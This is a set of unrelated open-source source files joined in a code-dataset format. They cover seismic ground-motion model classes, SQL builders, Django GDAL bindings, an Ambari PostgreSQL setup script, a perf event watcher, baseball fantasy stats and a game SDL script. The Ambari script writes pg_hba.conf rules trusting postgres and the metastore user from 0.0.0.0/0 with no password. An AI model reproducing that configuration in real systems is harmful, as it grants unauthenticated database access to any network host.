1.5 -3.0686 0.165 -0.1184 -0.165 0.1184 2.8498 5.6705 1.06 2.8161 -2.1 -0.5 50 7.5817 3.8284 0.4501 0.0352 -0.063 0.2154 0.2695 5.7688 0.5101 0.1 6.5 0. -0.102 -0.002979 -0.001675 4.0029 -1.1142 -0.0425 -0.007707 0.031787 0.143 300 1.8872 0.0356 -0.9245 0.96 800. 0.4515 0.3335 0.4783 0.468 0.7136 0.5276
2 -3.4148 0.1645 -0.11 -0.1645 0.11 2.5417 5.7981 1.06 2.8514 -2.1 -0.5 50 7.5818 3.833 0.45 0.0352 -0.0665 0.2154 0.2695 6.0723 0.3917 0.1 6.5 0. -0.1009 -0.002301 -0.002349 3.8949 -1.1154 -0.0302 -0.004792 0.019716 0.203 300 2.1348 0. -0.8626 1.11 800. 0.4534 0.3363 0.4681 0.4681 0.7035 0.5167
3 -3.9013 0.1168 -0.104 -0.1168 0.104 2.1488 5.9983 1.06 2.8875 -2.1 -0.5 50 7.5818 3.8361 0.45 0.016 -0.0516 0.2154 0.2695 6.5 0.1244 0.1 6.5 0. -0.1003 -0.001344 -0.003306 3.7928 -1.1081 -0.0129 -0.001828 0.009643 0.277 300 3.5752 0. -0.7882 1.291 800. 0.4558 0.3398 0.4617 0.4617 0.7006 0.4917
4 -4.2466 0.0732 -0.102 -0.0732 0.102 1.8957 6.1552 1.06 2.9058 -2.1 -0.5 50 7.5818 3.8369 0.45 0.0062 -0.0448 0.2154 0.2695 6.8035 0.0086 0.1 6.5 0. -0.1001 -0.001084 -0.003566 3.7443 -1.0603 -0.0016 -0.001523 0.005379 0.309 300 3.8646 0. -0.7195 1.387 800. 0.4574 0.3419 0.4571 0.4571 0.7001 0.4682
5 -4.5143 0.0484 -0.101 -0.0484 0.101 1.7228 6.2856 1.06 2.9169 -2.1 -0.5 50 7.5818 3.8376 0.45 0.0029 -0.0424 0.2154 0.2695 7.0389 0. 0.1 6.5 0. -0.1001 -0.00101 -0.00364 3.709 -0.9872 0. -0.00144 0.003223 0.321 300 3.7292 0. -0.656 1.433 800. 0.4584 0.3435 0.4535 0.4535 0.7 0.4517
7.5 -5.0009 0.022 -0.101 -0.022 0.101 1.5737 6.5428 1.06 2.932 -2.1 -0.5 50 7.5818 3.838 0.45 0.0007 -0.0348 0.2154 0.2695 7.4666 0. 0.1 6.5 0. -0.1 -0.000964 -0.003686 3.6632 -0.8274 0. -0.001369 0.001134 0.329 300 2.3763 0. -0.5202 1.46 800. 0.4601 0.3459 0.4471 0.4471 0.7 0.4167
10 -5.3461 0.0124 -0.1 -0.0124 0.1 1.5265 6.7415 1.06 2.9396 -2.1 -0.5 50 7.5818 3.838 0.45 0.0003 -0.0253 0.2154 0.2695 7.77 0. 0.1 6.5 0. -0.1 -0.00095 -0.0037 3.623 -0.7053 0. -0.001361 0.000515 0.33 300 1.7679 0. -0.4068 1.464 800. 0.4612 0.3474 0.4426 0.4426 0.7 0.3755
""")
class ChiouYoungs2014PEER(ChiouYoungs2014):
    """
    Chiou & Youngs (2014) as configured for the PEER test cases: only
    PGA is supported and the total standard deviation is fixed at 0.65.
    """
    #: Only the total standard deviation is defined
    DEFINED_FOR_STANDARD_DEVIATION_TYPES = set([
        const.StdDev.TOTAL,
    ])

    #: The PEER tests require only PGA
    DEFINED_FOR_INTENSITY_MEASURE_TYPES = set([
        PGA,
    ])

    def _get_stddevs(self, sites, rup, C, stddev_types, ln_y_ref, exp1, exp2):
        """
        Return the standard deviation, fixed at 0.65 for every site.
        """
        for stddev_type in stddev_types:
            assert stddev_type in self.DEFINED_FOR_STANDARD_DEVIATION_TYPES
        # only TOTAL can appear in stddev_types (enforced above)
        return [0.65 * np.ones_like(sites.vs30)
                for stddev_type in stddev_types
                if stddev_type == const.StdDev.TOTAL]
class ChiouYoungs2014NearFaultEffect(ChiouYoungs2014):
    """
    Chiou & Youngs (2014) with the near-fault directivity effect
    enabled: the directivity prediction parameter is read from the
    distance context instead of being fixed at zero.
    """
    #: Required distance measures are RRup, Rjb, Rx, and Rcdpp
    REQUIRES_DISTANCES = set(('rrup', 'rjb', 'rx', 'rcdpp'))

    def _get_centered_cdpp(self, dists):
        """
        Return the centered directivity prediction parameter, carried
        per-site on the distance context as ``rcdpp``.
        """
        return dists.rcdpp
| agpl-3.0 |
GreatFruitOmsk/screenly-ose | lib/queries.py | 3 | 1135 |
# SQL builders for the ``assets`` table. Each helper returns a
# parametrized SQL string; callers supply the values separately, so no
# user data is ever interpolated into the SQL text.
# (Converted from lambda-assignments to named functions per PEP 8 E731.)


def comma(values):
    """Join *values* with commas: ['a', 'b'] -> 'a,b'."""
    return ','.join(values)


def quest(l):
    """Build a placeholder assignment list: ['a', 'b'] -> 'a=?,b=?'."""
    return '=?,'.join(l) + '=?'


def quest_2(l, c):
    """Build one CASE expression per key in *l*, each switching on
    asset_id over *c* (asset_id, value) placeholder pairs."""
    whens = "WHEN asset_id=? THEN ? " * c
    return ', '.join(('%s=CASE ' % x) + whens + 'ELSE asset_id END'
                     for x in l)


# Probe for the existence of the assets table in the sqlite schema.
exists_table = "SELECT name FROM sqlite_master WHERE type='table' AND name='assets'"


def read_all(keys):
    """Select *keys* for every asset, in playlist order."""
    return 'select ' + comma(keys) + ' from assets order by play_order'


def read(keys):
    """Select *keys* for a single asset (asset_id bound at execution)."""
    return 'select ' + comma(keys) + ' from assets where asset_id=?'


def create(keys):
    """Insert a new asset row with one placeholder per key."""
    return ('insert into assets (' + comma(keys) + ') values (' +
            comma(['?'] * len(keys)) + ')')


# Delete a single asset by id.
remove = 'delete from assets where asset_id=?'


def update(keys):
    """Update *keys* of a single asset (asset_id bound last)."""
    return 'update assets set ' + quest(keys) + ' where asset_id=?'


def multiple_update(keys, count):
    """Update *keys* for *count* assets selected by id."""
    return ('UPDATE assets SET ' + quest(keys) +
            ' WHERE asset_id IN (' + comma(['?'] * count) + ')')


def multiple_update_not_in(keys, count):
    """Update *keys* for every asset NOT among the *count* given ids."""
    return ('UPDATE assets SET ' + quest(keys) +
            ' WHERE asset_id NOT IN (' + comma(['?'] * count) + ')')


def multiple_update_with_case(keys, count):
    """Update *keys* with per-asset values via CASE, for *count* assets."""
    return ('UPDATE assets SET ' + quest_2(keys, count) +
            ' WHERE asset_id IN (' + comma(['?'] * count) + ')')
| gpl-2.0 |
rvmoura96/projeto-almoxarifado | myvenv/Lib/site-packages/django/contrib/gis/gdal/prototypes/geom.py | 181 | 4946 | from ctypes import POINTER, c_char_p, c_double, c_int, c_void_p
from django.contrib.gis.gdal.envelope import OGREnvelope
from django.contrib.gis.gdal.libgdal import lgdal
from django.contrib.gis.gdal.prototypes.errcheck import check_envelope
from django.contrib.gis.gdal.prototypes.generation import (
const_string_output, double_output, geom_output, int_output, srs_output,
string_output, void_output,
)
# ### Generation routines specific to this module ###
def env_func(f, argtypes):
    "For getting OGREnvelopes."
    # The envelope is returned through an out-parameter, so the C routine
    # returns nothing itself; check_envelope (project errcheck hook)
    # extracts the OGREnvelope from the call arguments.
    f.argtypes = argtypes
    f.restype = None
    f.errcheck = check_envelope
    return f
def pnt_func(f):
    "For accessing point information."
    # Point accessors take (geometry handle, point index) and return a
    # C double; double_output wires up the prototype accordingly.
    return double_output(f, [c_void_p, c_int])
def topology_func(f):
    """Configure *f* as a binary topology predicate.

    The underlying OGR routine takes two geometry handles and returns a
    C int; the errcheck hook converts that int to a Python bool.
    """
    def _as_bool(result, func, cargs):
        return bool(result)

    f.argtypes = [c_void_p, c_void_p]
    f.restype = c_int
    f.errcheck = _as_bool
    return f
# ### OGR_G ctypes function prototypes ###
# GeoJSON routines.
from_json = geom_output(lgdal.OGR_G_CreateGeometryFromJson, [c_char_p])
to_json = string_output(lgdal.OGR_G_ExportToJson, [c_void_p], str_result=True, decoding='ascii')
to_kml = string_output(lgdal.OGR_G_ExportToKML, [c_void_p, c_char_p], str_result=True, decoding='ascii')
# GetX, GetY, GetZ all return doubles.
getx = pnt_func(lgdal.OGR_G_GetX)
gety = pnt_func(lgdal.OGR_G_GetY)
getz = pnt_func(lgdal.OGR_G_GetZ)
# Geometry creation routines.
from_wkb = geom_output(lgdal.OGR_G_CreateFromWkb, [c_char_p, c_void_p, POINTER(c_void_p), c_int], offset=-2)
from_wkt = geom_output(lgdal.OGR_G_CreateFromWkt, [POINTER(c_char_p), c_void_p, POINTER(c_void_p)], offset=-1)
from_gml = geom_output(lgdal.OGR_G_CreateFromGML, [c_char_p])
create_geom = geom_output(lgdal.OGR_G_CreateGeometry, [c_int])
clone_geom = geom_output(lgdal.OGR_G_Clone, [c_void_p])
get_geom_ref = geom_output(lgdal.OGR_G_GetGeometryRef, [c_void_p, c_int])
get_boundary = geom_output(lgdal.OGR_G_GetBoundary, [c_void_p])
geom_convex_hull = geom_output(lgdal.OGR_G_ConvexHull, [c_void_p])
geom_diff = geom_output(lgdal.OGR_G_Difference, [c_void_p, c_void_p])
geom_intersection = geom_output(lgdal.OGR_G_Intersection, [c_void_p, c_void_p])
geom_sym_diff = geom_output(lgdal.OGR_G_SymmetricDifference, [c_void_p, c_void_p])
geom_union = geom_output(lgdal.OGR_G_Union, [c_void_p, c_void_p])
# Geometry modification routines.
add_geom = void_output(lgdal.OGR_G_AddGeometry, [c_void_p, c_void_p])
import_wkt = void_output(lgdal.OGR_G_ImportFromWkt, [c_void_p, POINTER(c_char_p)])
# Destroys a geometry
destroy_geom = void_output(lgdal.OGR_G_DestroyGeometry, [c_void_p], errcheck=False)
# Geometry export routines.
to_wkb = void_output(lgdal.OGR_G_ExportToWkb, None, errcheck=True) # special handling for WKB.
to_wkt = string_output(lgdal.OGR_G_ExportToWkt, [c_void_p, POINTER(c_char_p)], decoding='ascii')
to_gml = string_output(lgdal.OGR_G_ExportToGML, [c_void_p], str_result=True, decoding='ascii')
get_wkbsize = int_output(lgdal.OGR_G_WkbSize, [c_void_p])
# Geometry spatial-reference related routines.
assign_srs = void_output(lgdal.OGR_G_AssignSpatialReference, [c_void_p, c_void_p], errcheck=False)
get_geom_srs = srs_output(lgdal.OGR_G_GetSpatialReference, [c_void_p])
# Geometry properties
get_area = double_output(lgdal.OGR_G_GetArea, [c_void_p])
get_centroid = void_output(lgdal.OGR_G_Centroid, [c_void_p, c_void_p])
get_dims = int_output(lgdal.OGR_G_GetDimension, [c_void_p])
get_coord_dim = int_output(lgdal.OGR_G_GetCoordinateDimension, [c_void_p])
set_coord_dim = void_output(lgdal.OGR_G_SetCoordinateDimension, [c_void_p, c_int], errcheck=False)
is_empty = int_output(lgdal.OGR_G_IsEmpty, [c_void_p], errcheck=lambda result, func, cargs: bool(result))
get_geom_count = int_output(lgdal.OGR_G_GetGeometryCount, [c_void_p])
get_geom_name = const_string_output(lgdal.OGR_G_GetGeometryName, [c_void_p], decoding='ascii')
get_geom_type = int_output(lgdal.OGR_G_GetGeometryType, [c_void_p])
get_point_count = int_output(lgdal.OGR_G_GetPointCount, [c_void_p])
get_point = void_output(
lgdal.OGR_G_GetPoint,
[c_void_p, c_int, POINTER(c_double), POINTER(c_double), POINTER(c_double)], errcheck=False
)
geom_close_rings = void_output(lgdal.OGR_G_CloseRings, [c_void_p], errcheck=False)
# Topology routines.
ogr_contains = topology_func(lgdal.OGR_G_Contains)
ogr_crosses = topology_func(lgdal.OGR_G_Crosses)
ogr_disjoint = topology_func(lgdal.OGR_G_Disjoint)
ogr_equals = topology_func(lgdal.OGR_G_Equals)
ogr_intersects = topology_func(lgdal.OGR_G_Intersects)
ogr_overlaps = topology_func(lgdal.OGR_G_Overlaps)
ogr_touches = topology_func(lgdal.OGR_G_Touches)
ogr_within = topology_func(lgdal.OGR_G_Within)
# Transformation routines.
geom_transform = void_output(lgdal.OGR_G_Transform, [c_void_p, c_void_p])
geom_transform_to = void_output(lgdal.OGR_G_TransformTo, [c_void_p, c_void_p])
# For retrieving the envelope of the geometry.
get_envelope = env_func(lgdal.OGR_G_GetEnvelope, [c_void_p, POINTER(OGREnvelope)])
| mit |
zouzhberk/ambaridemo | demo-server/src/main/resources/stacks/BIGTOP/0.8/services/HIVE/package/scripts/postgresql_server.py | 4 | 5069 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
from resource_management import *
from postgresql_service import postgresql_service
class PostgreSQLServer(Script):
  """Ambari lifecycle commands for the PostgreSQL instance backing the Hive metastore."""

  def install(self, env):
    # Install the OS packages, then immediately configure the database.
    self.install_packages(env)
    self.configure(env)

  def configure(self, env):
    import params
    env.set_params(params)

    # init the database, the ':' makes the command always return 0 in case the database has
    # already been initialized when the postgresql server colocates with ambari server
    Execute(format("service {postgresql_daemon_name} initdb || :"))

    # update the configuration files
    self.update_pghda_conf(env)
    self.update_postgresql_conf(env)

    # Reload the settings and start the postgresql server for the changes to take effect
    # Note: Don't restart the postgresql server because when Ambari server and the hive metastore on the same machine,
    # they will share the same postgresql server instance. Restarting the postgresql database may cause the ambari server database connection lost
    postgresql_service(postgresql_daemon_name=params.postgresql_daemon_name, action = 'reload')

    # ensure the postgresql server is started because the add hive metastore user requires the server is running.
    self.start(env)

    # create the database and hive_metastore_user
    # (the helper script is materialized with mode 0755 so it is executable)
    File(params.postgresql_adduser_path,
         mode=0755,
         content=StaticFile(format("{postgresql_adduser_file}"))
    )

    cmd = format("bash -x {postgresql_adduser_path} {postgresql_daemon_name} {hive_metastore_user_name} {hive_metastore_user_passwd!p} {db_name}")

    # retried because the server may still be coming up when first invoked
    Execute(cmd,
            tries=3,
            try_sleep=5,
            path='/usr/sbin:/sbin:/usr/local/bin:/bin:/usr/bin'
    )

  def start(self, env):
    import params
    env.set_params(params)

    postgresql_service(postgresql_daemon_name=params.postgresql_daemon_name, action = 'start')

  def stop(self, env):
    import params
    env.set_params(params)

    postgresql_service(postgresql_daemon_name=params.postgresql_daemon_name, action = 'stop')

  def status(self, env):
    import status_params
    # status uses status_params (lighter than full params) on purpose
    postgresql_service(postgresql_daemon_name=status_params.postgresql_daemon_name, action = 'status')

  def update_postgresql_conf(self, env):
    import params
    env.set_params(params)

    # change the listen_address to * (delete any existing setting, append ours)
    Execute(format("sed -i '/^[[:space:]]*listen_addresses[[:space:]]*=.*/d' {postgresql_conf_path}"))
    Execute(format("echo \"listen_addresses = '*'\" | tee -a {postgresql_conf_path}"))

    # change the standard_conforming_string to off
    Execute(format("sed -i '/^[[:space:]]*standard_conforming_strings[[:space:]]*=.*/d' {postgresql_conf_path}"))
    Execute(format("echo \"standard_conforming_strings = off\" | tee -a {postgresql_conf_path}"))

  def update_pghda_conf(self, env):
    import params
    env.set_params(params)

    # trust hive_metastore_user and postgres locally
    # (comment out the catch-all 'local all all' rule, drop stale rules,
    # then append trust rules for postgres and the metastore user)
    Execute(format("sed -i '/^[[:space:]]*local[[:space:]]*all[[:space:]]*all.*$/s/^/#/' {postgresql_pghba_conf_path}"))
    Execute(format("sed -i '/^[[:space:]]*local[[:space:]]*all[[:space:]]*postgres.*$/d' {postgresql_pghba_conf_path}"))
    Execute(format("sed -i '/^[[:space:]]*local[[:space:]]*all[[:space:]]*\"{hive_metastore_user_name}\".*$/d' {postgresql_pghba_conf_path}"))
    Execute(format("echo \"local all postgres trust\" | tee -a {postgresql_pghba_conf_path}"))
    Execute(format("echo \"local all \\\"{hive_metastore_user_name}\\\" trust\" | tee -a {postgresql_pghba_conf_path}"))

    # trust hive_metastore_user and postgres via local interface
    # NOTE(review): the appended rules use 0.0.0.0/0, i.e. any IPv4 host,
    # not only the local interface as the comment above suggests — confirm
    # this wide-open trust is intended.
    Execute(format("sed -i '/^[[:space:]]*host[[:space:]]*all[[:space:]]*all.*$/s/^/#/' {postgresql_pghba_conf_path}"))
    Execute(format("sed -i '/^[[:space:]]*host[[:space:]]*all[[:space:]]*postgres.*$/d' {postgresql_pghba_conf_path}"))
    Execute(format("sed -i '/^[[:space:]]*host[[:space:]]*all[[:space:]]*\"{hive_metastore_user_name}\".*$/d' {postgresql_pghba_conf_path}"))
    Execute(format("echo \"host all postgres 0.0.0.0/0 trust\" | tee -a {postgresql_pghba_conf_path}"))
    Execute(format("echo \"host all \\\"{hive_metastore_user_name}\\\" 0.0.0.0/0 trust\" | tee -a {postgresql_pghba_conf_path}"))


if __name__ == "__main__":
  PostgreSQLServer().execute()
| apache-2.0 |
boa19861105/BOA-M7_U | tools/perf/python/twatch.py | 7370 | 1334 | #! /usr/bin/python
# -*- python -*-
# -*- coding: utf-8 -*-
# twatch - Experimental use of the perf python interface
# Copyright (C) 2011 Arnaldo Carvalho de Melo <acme@redhat.com>
#
# This application is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2.
#
# This application is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import perf
def main():
	"""Watch task (fork/exit) and comm events on every CPU of every thread
	and print each sample as it arrives.  Runs until interrupted."""
	cpus = perf.cpu_map()
	threads = perf.thread_map()
	# NOTE(review): SAMPLE_TID appears twice in the sample_type mask below;
	# ORing a flag in twice is a no-op, so the second one may have been
	# intended as a different SAMPLE_* flag -- confirm against the perf
	# python binding before changing.
	evsel = perf.evsel(task = 1, comm = 1, mmap = 0,
			   wakeup_events = 1, watermark = 1,
			   sample_id_all = 1,
			   sample_type = perf.SAMPLE_PERIOD | perf.SAMPLE_TID | perf.SAMPLE_CPU | perf.SAMPLE_TID)
	evsel.open(cpus = cpus, threads = threads);
	evlist = perf.evlist(cpus, threads)
	evlist.add(evsel)
	evlist.mmap()
	while True:
		# Block indefinitely until at least one mmap'ed buffer has data.
		evlist.poll(timeout = -1)
		for cpu in cpus:
			event = evlist.read_on_cpu(cpu)
			if not event:
				continue
			# Python 2 print statement; the trailing comma keeps the
			# event itself on the same output line.
			print "cpu: %2d, pid: %4d, tid: %4d" % (event.sample_cpu,
								event.sample_pid,
								event.sample_tid),
			print event
# Script entry point.
if __name__ == '__main__':
	main()
| gpl-2.0 |
dondrake/mlb_stats_spark | BattingStats.py | 1 | 5584 | import re
class BattingStats(object):
    """Per-player, per-game batting statistics plus FanDuel fantasy points.

    One instance accumulates the outcome of play-by-play events for a single
    (game_id, player_id) pair via handleFDEvent().  Instances support ``+``
    so that Spark's reduceByKey() can merge the partial stats produced for
    each individual event.
    """

    def __init__(self):
        # Dimension columns: identify the row; never summed by __add__.
        self.game_id = ""
        self.player_id = 0
        # Counting stats ("fd_points_*" are the FanDuel point breakdowns).
        self.ab = 0            # at-bats
        self._1b = 0           # singles
        self._2b = 0           # doubles
        self.fd_points_2b = 0.0
        self._3b = 0           # triples
        self.fd_points_3b = 0.0
        self.hr = 0            # home runs
        self.fd_points_hr = 0.0
        self.rbi = 0           # runs batted in
        self.r = 0             # runs scored
        self.bb = 0            # walks
        self.sb = 0            # stolen bases
        self.fd_points_sb = 0.0
        self.hbp = 0           # hit by pitch
        self.out = 0
        self.fd_points_out = 0.0
        self.total_hits = 0
        self.fd_points_tb = 0.0
        self.fd_points = 0.0   # total FanDuel points for this row

    def __repr__(self):
        return str(self.__dict__)

    def __add__(self, other):
        """Return a new BattingStats with every measure summed.

        The dimensions (game_id, player_id) are taken from ``self``; callers
        are expected to only add instances that share the same key.
        """
        b = BattingStats()
        # don't agg dims
        b.game_id = self.game_id
        b.player_id = self.player_id
        b.ab = self.ab + other.ab
        b._1b = self._1b + other._1b
        b._2b = self._2b + other._2b
        b.fd_points_2b = self.fd_points_2b + other.fd_points_2b
        b._3b = self._3b + other._3b
        b.fd_points_3b = self.fd_points_3b + other.fd_points_3b
        b.hr = self.hr + other.hr
        b.fd_points_hr = self.fd_points_hr + other.fd_points_hr
        b.rbi = self.rbi + other.rbi
        b.r = self.r + other.r
        b.bb = self.bb + other.bb
        b.sb = self.sb + other.sb
        b.fd_points_sb = self.fd_points_sb + other.fd_points_sb
        b.hbp = self.hbp + other.hbp
        b.out = self.out + other.out
        b.fd_points_out = self.fd_points_out + other.fd_points_out
        b.total_hits = self.total_hits + other.total_hits
        b.fd_points_tb = self.fd_points_tb + other.fd_points_tb
        b.fd_points = self.fd_points + other.fd_points
        return b

    def handleFDEvent(self, event):
        """Fold a single play-by-play event into this instance's stats.

        ``event`` must expose: game_id, batter, pitcher, des (description
        text) and fd_batter_event (normalized event code, or None).

        Raises:
            Exception: for an fd_batter_event of None whose description is
                not the known "is now pitching" pitcher-change notice.
        """
        # Runs are under counted, we need to look up all player names:
        # Kole Calhoun homers (2) on a fly ball to right center field. Chris Iannetta scores. Johnny Giavotella scores.
        # This should be handled upstream...
        # This is for WPs (pitcher stats): no batter involved, nothing to do.
        if event.batter <= 0:
            return
        self.game_id = event.game_id
        self.player_id = event.batter
        # Assume an at-bat up front; non-AB events decrement it below.
        self.ab += 1
        if event.fd_batter_event in ['SO', 'O']:
            self.out += 1
        elif event.fd_batter_event == 'H':
            self._1b += 1
            self.total_hits += 1
        elif event.fd_batter_event == 'W':
            self.bb += 1
            self.ab -= 1
        elif event.fd_batter_event == 'HR':
            self.hr += 1
            self.total_hits += 1
            self.rbi += 1
            self.r += 1
        elif event.fd_batter_event == 'HBP':
            self.hbp += 1
            self.ab -= 1
        elif event.fd_batter_event == 'SB':
            self.sb += 1
            self.ab -= 1
        elif event.fd_batter_event == '2B':
            self._2b += 1
            self.total_hits += 1
        elif event.fd_batter_event == '3B':
            self._3b += 1
            self.total_hits += 1
        elif event.fd_batter_event == 'R':
            # Fake event synthesized elsewhere for a run scored.
            self.r += 1
            self.ab -= 1
        elif event.fd_batter_event == 'SAC':
            # not a hit, but doesn't count as an at bat
            self.ab -= 1
        elif event.fd_batter_event == 'FC':
            # fielder's choice: not a hit, but does count as an at bat
            pass
        elif event.fd_batter_event == 'E':
            # error: counts as an at bat
            pass
        elif event.fd_batter_event == 'BALK':
            self.ab -= 1
        elif event.fd_batter_event is None:
            if "is now pitching" in event.des:
                # switch-pitcher!?! e.g.
                # 'unhandled event:', None, u'Pat Venditte is now pitching right-handed. '
                pass
            else:
                raise Exception("unhandled event:", event.fd_batter_event, event.des, event.game_id, event.batter, event.pitcher)
        # NOTE(review): any non-None event code not matched above falls
        # through silently and is counted as a plain at-bat -- confirm
        # that is intended.

        # Credit an RBI for each "<name> scores." phrase in the description:
        # 'Russell Martin doubles (8) ... Andrew McCutchen scores. Neil Walker scores. '
        # Raw string avoids invalid \w / \. escape warnings; re.findall
        # always returns a list (possibly empty), never None.
        res = re.findall(r'[\w ]+ scores\.', event.des)
        self.rbi += len(res)
        # Recompute outs from at-bats vs hits (supersedes the SO/O tally).
        self.out = self.ab - self.total_hits

        # FanDuel scoring weights.
        fantasyPoints = 0.0
        fantasyPoints += (3.0 * self._1b)
        fantasyPoints += (6.0 * self._2b)
        fantasyPoints += (9.0 * self._3b)
        fantasyPoints += (12.0 * self.hr)
        fantasyPoints += (3.5 * self.rbi)
        fantasyPoints += (3.2 * self.r)
        fantasyPoints += (3.0 * self.bb)
        fantasyPoints += (6.0 * self.sb)
        fantasyPoints += (3.0 * self.hbp)
        #fantasyPoints -= (0.25 * self.out)
        #fantasyPoints /= player['G']
        self.fd_points = fantasyPoints
        # Per-category point breakdowns.
        self.fd_points_2b += (6.0 * self._2b)
        self.fd_points_3b += (9.0 * self._3b)
        self.fd_points_hr += (12.0 * self.hr)
        self.fd_points_sb += (6.0 * self.sb)
        #self.fd_points_out -= (0.25 * self.out)
        # NOTE(review): "total bases" here mixes counts (bb, _1b) with point
        # values (fd_points_*) -- looks intentional but worth confirming.
        self.fd_points_tb += self.bb + self._1b + self.fd_points_2b + self.fd_points_3b + self.fd_points_hr

    @staticmethod
    def mapEventstoBattingStats(event):
        """Map one event to a ("game_id|batter", BattingStats) pair for Spark."""
        battingStats = BattingStats()
        battingStats.handleFDEvent(event)
        key = "|".join(map(str, [event.game_id, event.batter]))
        return (key, battingStats)

    @staticmethod
    def reduceByKey(a, b):
        """Combine two partial BattingStats; tolerates a None left operand."""
        if a is None:
            return b
        return a + b
| apache-2.0 |
Lyrositor/moul-scripts | Python/xAgeSDLBoolShowHide.py | 12 | 5302 | # -*- coding: utf-8 -*-
""" *==LICENSE==*
CyanWorlds.com Engine - MMOG client, server and tools
Copyright (C) 2011 Cyan Worlds, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Additional permissions under GNU GPL version 3 section 7
If you modify this Program, or any covered work, by linking or
combining it with any of RAD Game Tools Bink SDK, Autodesk 3ds Max SDK,
NVIDIA PhysX SDK, Microsoft DirectX SDK, OpenSSL library, Independent
JPEG Group JPEG library, Microsoft Windows Media SDK, or Apple QuickTime SDK
(or a modified version of those libraries),
containing parts covered by the terms of the Bink SDK EULA, 3ds Max EULA,
PhysX SDK EULA, DirectX SDK EULA, OpenSSL and SSLeay licenses, IJG
JPEG Library README, Windows Media SDK EULA, or QuickTime SDK EULA, the
licensors of this Program grant you additional
permission to convey the resulting work. Corresponding Source for a
non-source form of such a combination shall include the source code for
the parts of OpenSSL and IJG JPEG Library used as well as that of the covered
work.
You can contact Cyan Worlds, Inc. by email legal@cyan.com
or by snail mail at:
Cyan Worlds, Inc.
14617 N Newport Hwy
Mead, WA 99021
*==LICENSE==* """
from Plasma import *
from PlasmaTypes import *
# Max plugin attributes, wired up by the Plasma engine when this component
# is attached to a SceneObject in the artist's scene.
sdlName = ptAttribString(1, "Age SDL Var Name")  # SDL boolean variable to watch
showOnTrue = ptAttribBoolean(2, "Show on true", default=True)  # show when var is True, hide otherwise
defaultValue = ptAttribBoolean(3, "Default setting", default=False)  # fallback when the SDL lookup fails
evalOnFirstUpdate = ptAttribBoolean(4, "Eval On First Update?", default=False)  # evaluate in OnFirstUpdate vs OnServerInitComplete
class xAgeSDLBoolShowHide(ptMultiModifier, object):
    """Shows or hides attached SceneObjects based on the value of an SDL boolean variable"""

    def __init__(self):
        ptMultiModifier.__init__(self)
        # Plasma modifier identification (id/version pair).
        self.id = 5037
        self.version = 2

    def OnBackdoorMsg(self, target, param):
        # Developer console "backdoor": force the object shown or hidden by
        # naming the watched SDL variable; bypasses the actual SDL value.
        if sdlName.value:
            if target == sdlName.value:
                if param.lower() in {"on", "1", "true"}:
                    self._EnableObject()
                elif param.lower() in {"off", "0", "false"}:
                    self._DisableObject()
                else:
                    PtDebugPrint("xAgeSDLBoolShowHide.OnBackDoorMsg: Received unexpected parameter on %s" % self.sceneobject.getName())

    def OnFirstUpdate(self):
        # Evaluate immediately on first update only if the artist asked for
        # it; otherwise defer to OnServerInitComplete below.
        if evalOnFirstUpdate.value:
            self._Setup()

    def OnSDLNotify(self, VARname, SDLname, playerID, tag):
        # SDL change callback: re-read the variable.  Assigning sdl_value
        # fires the write-only property at the bottom, applying show/hide.
        if VARname == sdlName.value:
            ageSDL = PtGetAgeSDL()
            self.sdl_value = ageSDL[sdlName.value][0]

    def OnServerInitComplete(self):
        if not evalOnFirstUpdate.value:
            self._Setup()

    def _DisableObject(self):
        # Hide: turn off both drawing and physics on the attached SceneObject.
        PtDebugPrint("xAgeSDLBoolShowHide.DisableObject: Attempting to disable drawing and collision on %s..." % self.sceneobject.getName(), level=kDebugDumpLevel)
        self.sceneobject.draw.disable()
        self.sceneobject.physics.suppress(True)

    def _EnableObject(self):
        # Show: re-enable drawing and physics.
        PtDebugPrint("xAgeSDLBoolShowHide.EnableObject: Attempting to enable drawing and collision on %s..." % self.sceneobject.getName(), level=kDebugDumpLevel)
        self.sceneobject.draw.enable()
        self.sceneobject.physics.suppress(False)

    def _Setup(self):
        # Register interest in the SDL variable and apply its current value.
        ageSDL = PtGetAgeSDL()
        if not ageSDL:
            PtDebugPrint("xAgeSDLBoolShowHide._Setup():\tAgeSDLHook is null... You've got problems, friend.")
            self.sdl_value = defaultValue.value # start at default
            return None
        if sdlName.value:
            # So, apparently, Cyan's artists like trailing whitespace...
            if sdlName.value.find(" ") != -1:
                PtDebugPrint("xAgeSDLBoolShowHide._Setup():\tWARNING: %s's SDL variable '%s' has whitespace. Removing!" % (self.sceneobject.getName(), sdlName.value))
                sdlName.value = sdlName.value.replace(" ", "")
            ageSDL.setFlags(sdlName.value, 1, 1)
            ageSDL.sendToClients(sdlName.value)
            ageSDL.setNotify(self.key, sdlName.value, 0.0)
            # Sometimes, Cyan's artists just fail.
            try:
                self.sdl_value = ageSDL[sdlName.value][0]
            except LookupError:
                PtDebugPrint("xAgeSDLBoolShowHide._Setup():\tVariable '%s' is invalid on object '%s'" % (sdlName.value, self.sceneobject.getName()))
                self.sdl_value = defaultValue.value
        else:
            # Apply the default first so the object is in a defined state,
            # then fail loudly: a missing variable name is an authoring error.
            self.sdl_value = defaultValue.value # start at default
            raise RuntimeError("You forgot to set the SDL Variable Name!")

    def _set_sdl_value(self, value):
        # Hide when the value disagrees with "Show on true" (boolean XOR),
        # show when it agrees.
        if value ^ showOnTrue.value:
            self._DisableObject()
        else:
            self._EnableObject()

